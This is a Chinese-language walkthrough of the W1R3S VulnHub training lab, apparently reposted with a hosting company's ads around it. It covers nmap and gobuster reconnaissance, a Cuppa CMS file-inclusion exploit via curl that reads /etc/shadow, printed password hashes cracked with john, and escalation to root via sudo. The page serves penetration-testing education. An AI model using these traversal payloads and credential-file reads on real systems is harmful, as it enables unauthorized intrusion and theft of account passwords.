靶机地址：https://www.vulnhub.com/entry/w1r3s-101,220/
下载地址：https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

“只有客户发展了，才有我们的生存与发展！”这是成都创新互联的服务宗旨！把网站当作互联网产品，产品思维更注重全局思维、需求分析和迭代思维，在网站建设中就是为了建设一个不仅审美在线，而且实用性极高的网站。创新互联对做网站、成都网站设计、网站制作、网站开发、网页设计、网站优化、网络推广、探索永无止境。

确定靶机网段
ip a

确定靶机IP（扫描C段/B段，此时为校园网）->10.170.19.36
sudo nmap -sn 10.170.0.0/16或sudo netdiscover -i eth0 -r 10.170.0.0/16

全面探测端口（建议至少扫两遍）（kali中扫描小于1024端口的操作需要系统权限）
可以用以下命令（-sS：半开扫描需要root权限；-n：不做DNS解析(快速扫描)；-p-：所有端口；--max-retries=0：重传设定为0，速度更快，可能会丢失部分数据；-Pn：非ping扫描，不执行主机发现，可以跳过防火墙。
sudo nmap -n -v -sS -p- 10.170.19.36 --min-rate=10000 --max-retries=0 -oN allports.txt -Pn
查看打印的报告allports.txt

再调用默认插件对打印出的报告里的端口进行扫描，grep ^[0-9]正则匹配数字开头；cut -d / -f1指以/分割，取第一部分，如21/tcp取21；tr '\n' ','换行换成,；sed s/,$//将结尾的,替换为空。
nmap -n -v -sC -sV -p $(cat allports.txt | grep ^[0-9] |cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.170.19.36 -oN nmap.txt -Pn

按照一定的顺序来逐个排查端口：如21 ->80 ->3306 ->22

检查21端口
尝试匿名登陆
ftp 10.170.19.36

查看当前目录
dir/ls

依次cd进目录，mget(多个文件)/get(单个文件)，下载里面的文件，bye退出
注：下载前，输入binary命令（ Binary模式不会对数据进行任何处理；Ascii模式会将回车换行转换为本机的回车字符），防止传输后的文件被破坏
ls -lt按照时间查看下载到本地的文件

cat -n *.txt打开所有文件查看
01ec2d8fc11c493b25029fb1f47f39ce->明显是MD5，可以用hash-identifier识别一下

拿去hashes.com解密
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
另一条是
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==->base 64
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==:It is easy, but not that easy..
都没什么用
还有一些员工信息，包括姓名、职位，可以用来构造字典，

其他的一些信息，看起来是顺序颠倒的，肉眼能看出其是上下左右颠倒，大概能读出意思

去搜一下关于颠倒文本的网站，解密一下
第一句是filp

第二句是flip+ reverse

都没啥用，花费了不少时间在ftp上面，接下来换一种方式

检查80端口
先上目录扫描工具
第一种工具：gobuster
sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.170.19.36/

包括/administrator，/javascript，/wordpress等
第二种工具：feroxbuster，可以扫多级目录

进入http://10.170.19.36/administrator跳转到/administrator/installation/
标题显示为Cuppa CMS

搜索有没有Cuppa CMS的漏洞可以利用
searchsploit cuppa cms

下载该文件
searchsploit cuppa cms -m 25971
查看该文件，是PHP代码注入，其中urlConfig参数有文件包含漏洞

利用的实例如下

看到feroxbuster扫出二级目录/administrator/alerts，根据样例，这里我们构造http://10.170.19.36/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是以GET方式直接访问显示不全

尝试以POST方式访问

还可以用curl post数据访问，这里尝试访问shadow文件，将结果存入到hash文件中
curl --data urlConfig=../../../../../../../../../etc/shadow http://10.170.19.36/administrator/alerts/alertConfigField.php -o hash
得到3个账号密码，开始的 6 6 6位为加密标志，后面8位为salt，后面的为hash
（$6开头表示是SHA-512加密，$1是MD5，$5是SHA-256）
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
使用john破解hash
john hash

拿到密码，尝试ssh连接
ssh w1r3s@10.170.19.36
然后执行sudo -l，看到下面的(ALL : ALL) ALL，表明该用户可以执行任何指令

执行sudo su -，直接来到root主目录，拿到flag

1670244109857)]
执行sudo su -，直接来到root主目录，拿到flag
[外链图片转存中…(img-fZownBFc-1670244109857)]

你是否还在寻找稳定的海外服务器提供商？创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源，准确流量调度确保服务器高可用性，企业级服务器适合批量采购，新人活动首月15元起，快前往官网查看详情吧

本文名称：W1R3S-VulnHub（漏洞靶机渗透测试）-创新互联
网页链接：http://sczitong.cn/article/iepod.html